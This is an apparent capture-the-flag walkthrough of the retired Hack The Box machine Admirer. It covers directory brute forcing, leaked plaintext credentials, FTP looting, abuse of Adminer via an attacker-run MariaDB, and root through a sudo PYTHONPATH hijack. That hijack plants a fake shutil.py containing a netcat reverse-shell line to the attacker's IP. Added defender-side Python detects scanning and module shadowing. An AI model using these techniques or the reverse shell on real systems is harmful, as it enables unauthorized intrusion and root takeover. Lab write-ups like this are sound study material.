Admirer

Name: Admirer
Release Date: 02 May 2020
Retire Date: 26 Sep 2020
OS: Linux
Base Points: Easy - Retired [0]
whois 00 days, 03 hours, 57 mins, 47 seconds
joohoi 00 days, 04 hours, 33 mins, 13 seconds
Creators: polarbearer, GibParadox
Pentest Workstation PDF: Admirer.pdf

Again, we start with ../AutoRecon/src/autorecon/autorecon.py 10.10.10.187

We've got HTTP, so our next move is checking for other folders.  AutoRecon has already found an /admin-dir so let's start there with:

 

gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/admin-dir -x php,html,txt 

 
┌──(kali㉿kali)-[~/Admirer]
└─$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/admin-dir -x php,html,txt   
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2021/03/07 23:31:20 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2021/03/07 23:42:54 Finished
===============================================================
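A defender-side counterpart to the scan above, added here as example code that is not part of the original writeup: it parses Apache combined-format access log lines (the sample lines are constructed to mirror the gobuster run, not real server logs), flags an IP that piles up distinct 403/404 misses in a short window, and flags any 200 response for a file name like credentials.txt that should never be served from a web root.

```python
"""Flag directory brute forcing and exposed credential files in Apache
combined-format access logs; added defender-side check for the scan above."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) ')
# File names that should never answer 200 from a web root (the names found on this box).
SENSITIVE_RE = re.compile(r'/(credentials|contacts|dump|backup)[^/]*\.(txt|sql|tar\.gz)$'
                          r'|/\.ht(access|passwd)', re.I)
# Constructed sample lines mirroring the gobuster run above, not real server logs.
SAMPLE_LOG = """\
10.10.14.4 - - [07/Mar/2021:23:31:20 +0000] "GET /admin-dir/.htaccess HTTP/1.1" 403 277 "-" "gobuster/3.0.1"
10.10.14.4 - - [07/Mar/2021:23:31:20 +0000] "GET /admin-dir/.htaccess.php HTTP/1.1" 403 277 "-" "gobuster/3.0.1"
10.10.14.4 - - [07/Mar/2021:23:31:21 +0000] "GET /admin-dir/.htpasswd HTTP/1.1" 403 277 "-" "gobuster/3.0.1"
10.10.14.4 - - [07/Mar/2021:23:31:21 +0000] "GET /admin-dir/zzz.html HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.10.14.4 - - [07/Mar/2021:23:31:22 +0000] "GET /admin-dir/zzz.txt HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
10.10.14.4 - - [07/Mar/2021:23:42:50 +0000] "GET /admin-dir/credentials.txt HTTP/1.1" 200 136 "-" "gobuster/3.0.1"
10.10.14.9 - - [07/Mar/2021:23:35:00 +0000] "GET /images/logo.png HTTP/1.1" 404 275 "-" "Mozilla/5.0"
""".splitlines()

def parse(line):
    """Return (ip, timestamp, path, status) for one log line, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])

def analyze(lines, window_s=60, threshold=5):
    """Return (brute_force_ips, disclosures): an IP is flagged once it collects `threshold`
    distinct 403/404 paths within `window_s` seconds; a disclosure is a 200 for a sensitive name."""
    misses, disclosures = defaultdict(list), []
    for ip, ts, path, status in filter(None, map(parse, lines)):
        if status in (403, 404):
            misses[ip].append((ts, path))
        elif status == 200 and SENSITIVE_RE.search(path):
            disclosures.append((ip, path))
    flagged = set()
    for ip, hits in misses.items():
        hits.sort()  # sliding window over miss times, each hit in turn as the window end
        for i, (end, _) in enumerate(hits):
            recent = {p for t, p in hits[:i + 1] if (end - t).total_seconds() <= window_s}
            if len(recent) >= threshold:
                flagged.add(ip)
                break
    return flagged, disclosures
```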
 

Both contacts.txt and credentials.txt inside the admin-dir folder look promising. We can grab them with simple wget commands.

 

wget http://10.10.10.187/admin-dir/contacts.txt

wget http://10.10.10.187/admin-dir/credentials.txt

 

Then we can cat them out and get some juicy credentials (FTP, an internal mail account, and WordPress).

 
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ cat contacts.txt                               
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb
                                                                                                                          
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ cat credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!
 

Now that we have some creds, let's jump to the FTP side of the world. 

 
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp> get dump.sql
local: dump.sql remote: dump.sql
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.00 secs (1.7980 MB/s)
ftp> get html.tar.gz
local: html.tar.gz remote: html.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
226 Transfer complete.
5270987 bytes received in 7.35 secs (700.0977 kB/s)
ftp>
 

Notice the dump.sql and html.tar.gz files; I went ahead and used FTP get commands to pull both down. Go ahead and extract html.tar.gz. Since we're looking for passwords, run "grep -ir password" over the extracted tree, which turns up credentials inside the index.php file.

So, if we cat index.php and ./utility-scripts/db-admin.php, we can see who those credentials belong to.

The credentials belong to "waldo". Also, if we look at admin_tasks.php, we see either a PCI-DSS violation (the web server revealing its internal directory structure) or a possible vulnerability built into the page itself, where it calls /opt/scripts/admin_tasks.sh.

Since the utility-scripts folder did not show up in our first gobuster scan, let's run gobuster against it and see what we can find, using "gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/utility-scripts -x php,html,txt". This is where we find the adminer.php page.

 
┌──(kali㉿kali)-[~/…/10.10.10.187/loot/html/utility-scripts]
└─$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/utility-scripts -x php,html,txt  
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/utility-scripts
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2021/03/08 08:02:09 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/adminer.php (Status: 200)
/info.php (Status: 200)
/phptest.php (Status: 200)
===============================================================
2021/03/08 08:09:58 Finished
===============================================================
 

Adminer is a MySQL management tool, and we know there's a MySQL instance running on 3306. Trying to log in with either of the two waldo credentials we've already found fails miserably. A little bit of research later, I find this: https://infosecwriteups.com/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f. It looks like we're doing this the long way.

 

First, let's install MariaDB (if we haven't already) and set up a new local database on our attacking machine. We do this with:

 

sudo apt-get install mariadb-server-10.5 mariadb-client-10.5 -y

 

Now, we have to start the service and configure a database.  We do that with:

 

sudo systemctl start mariadb

sudo mysql -u root

MariaDB [(none)]> CREATE DATABASE backup;

USE backup;

CREATE TABLE backup (name VARCHAR(2000));

CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY 'toor';

GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187';

Next, we make sure that traffic is allowed between Admirer and our Attacking machine and that the connection is bound to our tun0 adapter.  We do that with:

 

vi /etc/mysql/mariadb.conf.d/50-server.cnf

 

Inside the 50-server.cnf file, change bind-address to your tun0 address (in my case 10.10.14.4), or allow all addresses by setting it to 0.0.0.0. From Adminer on the target, we should then be able to log in to our own database as the backup user and query a local file from Admirer.

It looks like Waldo updated his password to "&<h5b~yK3F#{PaPB&dA}{H>". So, let's try SSH with those credentials, and we are successful!

Now we can run LinEnum.sh on the target. One thing we find is that the script creating that lovely html.tar.gz backup file we've been digging around in for the past few hours is owned by root. Possibly, we can use that to get a Netcat callback as root. Looking back at the admin_tasks.sh script, we see it calling backup.py, and backup.py imports shutil. We can craft our own shutil.py, change the Python path, and call the admin_tasks script with the right positional argument. First, the Netcat callback.

 

shutil.py:

import os

def make_archive(h, t, b):
    os.system('nc 10.10.14.4 9999 -e "/bin/bash"')

 

Next, we have to change the Python path and call the 6th task of admin_tasks. I created this shutil.py in /dev/shm, so PYTHONPATH needs to point there, and the whole thing has to run under sudo. Start a Netcat listener on port 9999 and run:

 

sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 6

 

Voila!  Root Shell.
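The root cause here is that sudo let the caller's PYTHONPATH reach a root-run Python script, so a module placed first on the search path shadowed the stdlib shutil. As an added example (not the box's backup.py and not code from the original writeup), the pre-flight check below reproduces the shadowing offline with a constructed placeholder shutil.py in a temp directory and shows the test a privileged script could run before importing anything; the module names it checks are an assumption.

```python
"""Pre-flight check for a privileged Python helper (like backup.py here): refuse to run
when a standard-library module would be loaded from outside the interpreter's stdlib
directory, which is what a caller-controlled PYTHONPATH makes possible."""
import importlib.machinery
import os
import sysconfig
import tempfile

STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])


def module_origin(name, search_path=None):
    """Return the file `name` would be imported from for `search_path` (sys.path when
    None), or None if no file-backed module is found there."""
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    if spec is None or not spec.origin or spec.origin == "built-in":
        return None
    return os.path.realpath(spec.origin)


def is_shadowed(name, search_path=None):
    """True when `name` resolves to a file that is not inside the stdlib directory."""
    origin = module_origin(name, search_path)
    if origin is None:
        return False
    return os.path.commonpath([origin, STDLIB_DIR]) != STDLIB_DIR


def check_stdlib_integrity(names=("shutil", "subprocess")):
    """Return the modules that resolve outside the stdlib (assumed list of names); a
    privileged script should abort before importing anything when this is not empty."""
    return [n for n in names if is_shadowed(n)]


def demo_shadowing():
    """Reproduce the mechanism offline: a constructed stand-in shutil.py placed first on
    the search path, exactly where PYTHONPATH entries land. Returns (clean, poisoned)."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "shutil.py"), "w") as f:
            f.write("# constructed placeholder, contains no code\n")
        clean = is_shadowed("shutil", [STDLIB_DIR])
        poisoned = is_shadowed("shutil", [tmp, STDLIB_DIR])
    return clean, poisoned
```

Running the whole helper with python3 -I (isolated mode) or keeping PYTHONPATH out of sudo's env_keep removes the attack surface entirely; the check above is the belt to that pair of braces.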